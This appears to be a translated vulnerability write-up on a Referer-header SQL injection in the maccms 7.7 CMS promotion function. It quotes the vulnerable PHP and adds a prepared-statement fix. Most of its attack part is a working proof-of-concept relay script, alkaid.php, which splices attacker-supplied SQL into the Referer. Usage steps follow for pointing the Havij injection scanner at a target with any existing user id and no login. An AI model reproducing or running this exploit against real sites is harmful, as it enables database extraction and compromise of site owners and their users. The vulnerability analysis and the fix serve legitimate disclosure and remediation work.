This test targets maccms 7.7, the latest version on the official site, and differs somewhat from the earlier 6.x injection (the code has been restructured and the protection script provided by 360 is in use).
Combined with the injection in the old version, injection across all versions can be achieved.
/User/index.php line: 615

```php
function tg() // promotion function; 6.x used the English name popularize, which has been changed to the pinyin tg
{
    global $db;
    $userid = be("get", "uid");
    $userid = chkSql($userid, true); // completely uncontrollable after this filter
    if (!chkGlobalCache("tjlastdate")) {
        setGlobalCache("tjlastdate", date('Y-m-d'), 0);
    }
    if (isNum($userid)) {
        $ip = getIP();      // goes through the 360 filter script
        $ly = getReferer(); // the 360 filter script? see below
        $row = $db->getRow("select * from {pre}user where u_id=" . $userid . "");
        if ($row) {
            // do not misunderstand here: no login is needed for the injection, only a valid
            // "promoter" id; entering 1 always works unless the whole site has no members at all
            $sql = "select * from {pre}user_visit where uv_uid=" . $userid
                 . " and uv_ip='" . $ip . "' and STR_TO_DATE(uv_time,'%Y-%m-%d')='" . date("Y-m-d") . "'";
            // the exploit is not here; the referer is what is easy to control
            $row1 = $db->getRow($sql);
            if (!$row1) {
                // the ly variable enters the query; note that a date column follows it,
                // which must not be forgotten when constructing the payload later
                $db->Add("{pre}user_visit",
                         array("uv_uid", "uv_ip", "uv_ly", "uv_time"),
                         array($userid, $ip, $ly, date("Y-m-d H:i:s")));
                // the following code has nothing to do with it
                $db->query("update {pre}user set u_tj=u_tj+1,u_points=u_points+" . app_popularize
                           . " where u_id=" . $userid);
                if (strpos("," . date('Y-m-d H:i:s', time()), getGlobalCache("tjlastdate")) <= 0) {
                    $sql = "delete from {pre}user_visit where STR_TO_DATE(uv_time,'%Y-%m-%d')<'" . date("Y-m-d") . "'";
                    $db->query($sql);
                    setGlobalCache("tjlastdate", date('Y-m-d'), 0);
                }
            }
            unset($row1);
        }
        unset($row);
    }
    redirect("../");
}
```
Compared with 6.x, the code has been restructured and 360 has added a filtering script ......

/Inc/function.php line: 248

```php
function getReferer()
{
    return $_SERVER["HTTP_REFERER"];
}
```

The 360 filtering script is nowhere to be seen here; the referer goes in completely unfiltered ......
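For contrast, here is how the user_visit insert from tg() looks when the referer is passed as a bound parameter instead of being concatenated by the $db->Add() wrapper. This is an added example, not maccms code; it assumes ext/pdo_sqlite is available and uses an in-memory table with the same columns as above, with a constructed referer of the shape described in this write-up as the sample input.

```php
<?php
// Added example (not maccms code): the user_visit insert rewritten with a prepared
// statement, then exercised against an in-memory SQLite table mirroring the columns
// used in tg(). Assumes ext/pdo_sqlite; $prefix stands in for the {pre} placeholder.

function recordVisit(PDO $pdo, string $prefix, int $userid, string $ip, string $ly): bool
{
    // The Referer value is sent to the driver as a bound value, separate from the
    // statement text, so quotes or comment sequences inside it are stored literally
    // and can never change the shape of the INSERT. Length is capped as well, since
    // the header is fully client-controlled.
    $stmt = $pdo->prepare(
        "INSERT INTO {$prefix}user_visit (uv_uid, uv_ip, uv_ly, uv_time) VALUES (?, ?, ?, ?)"
    );
    return $stmt->execute([$userid, $ip, substr($ly, 0, 255), date('Y-m-d H:i:s')]);
}

// Constructed demo table (same columns as the snippet above, prefix mac_).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE mac_user_visit (uv_uid INTEGER, uv_ip TEXT, uv_ly TEXT, uv_time TEXT)");

// Constructed sample input: a referer carrying a quote and a comment marker.
$hostileReferer = "a',(select now()) and 1=1)#";
recordVisit($pdo, 'mac_', 1, '127.0.0.1', $hostileReferer);

// One row, with the referer stored exactly as received: the statement was not altered.
$stored = $pdo->query("SELECT uv_ly FROM mac_user_visit WHERE uv_uid = 1")->fetchColumn();
$count  = (int) $pdo->query("SELECT COUNT(*) FROM mac_user_visit")->fetchColumn();
var_dump($stored === $hostileReferer, $count === 1); // bool(true) bool(true)
```

The same change applies to the select and delete statements in tg(): the numeric uid is already filtered, but every string that reaches the query text should travel as a parameter.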
With the principle analysed, the next step is to demonstrate the impact and provide the PoC.
The referer must also carry the date value that follows it in the insert, so a small PHP relay script is used.
It forwards the request and takes the injection statement from $_GET["a"], splicing it into the referer.
For the date, now() is used directly. See the code below.

alkaid.php
```php
<?php
function uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE, $inject = '')
{
    $return = '';
    $matches = parse_url($url);
    !isset($matches['host']) && $matches['host'] = '';
    !isset($matches['path']) && $matches['path'] = '';
    !isset($matches['query']) && $matches['query'] = '';
    !isset($matches['port']) && $matches['port'] = '';
    $host = $matches['host'];
    $path = $matches['path'] ? $matches['path'] . ($matches['query'] ? '?' . $matches['query'] : '') : '/';
    $port = !empty($matches['port']) ? $matches['port'] : 80;
    if ($post) {
        $out  = "POST $path HTTP/1.0\r\n";
        $out .= "Accept: */*\r\n";
        //$out .= "Referer: $boardurl\r\n";
        $out .= "Accept-Language: zh-cn\r\n";
        $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n";
        $out .= "Cookie: $cookie\r\n\r\n";
    } else {
        $out  = "GET $path HTTP/1.0\r\n";
        $out .= "Accept: */*\r\n";
        // the statement from $_GET["a"] is spliced into the referer here
        $out .= "Referer: a',(select now()) and " . $inject . ")#\r\n";
        $out .= "Accept-Language: zh-cn\r\n";
        $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n";
        $out .= "Cookie: $cookie\r\n\r\n";
    }
    $fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
    if (!$fp) {
        return ''; // note $errstr : $errno \r\n
    } else {
        stream_set_blocking($fp, $block);
        stream_set_timeout($fp, $timeout);
        @fwrite($fp, $out);
        $status = stream_get_meta_data($fp);
        if (!$status['timed_out']) {
            // skip the response headers
            while (!feof($fp)) {
                if (($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) {
                    break;
                }
            }
            // read the body, honouring $limit if one was given
            $stop = false;
            while (!feof($fp) && !$stop) {
                $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
                $return .= $data;
                if ($limit) {
                    $limit -= strlen($data);
                    $stop = $limit <= 0;
                }
            }
        }
        @fclose($fp);
        return $return;
    }
}

uc_fopen('http://127.0.0.1/user/?action=tg&uid=1', 0, 0, 0, FALSE, '', 15, true, $_GET["a"]);
echo 'hi';
?>
```
Scan with Havij:
http://127.0.0.1/alkaid.php?a=1%3d1
The constructed referer is sent to http://127.0.0.1/user/?action=tg&uid=1
Usage:
1. Set up alkaid.php locally.
2. In the last few lines of alkaid.php, change http://127.0.0.1/user/?action=tg&uid=1 to the corresponding test address; set uid to an existing user (no login is required).
3. Point the scanner at the local alkaid.php: http://127.0.0.1/alkaid.php?a=1%3d1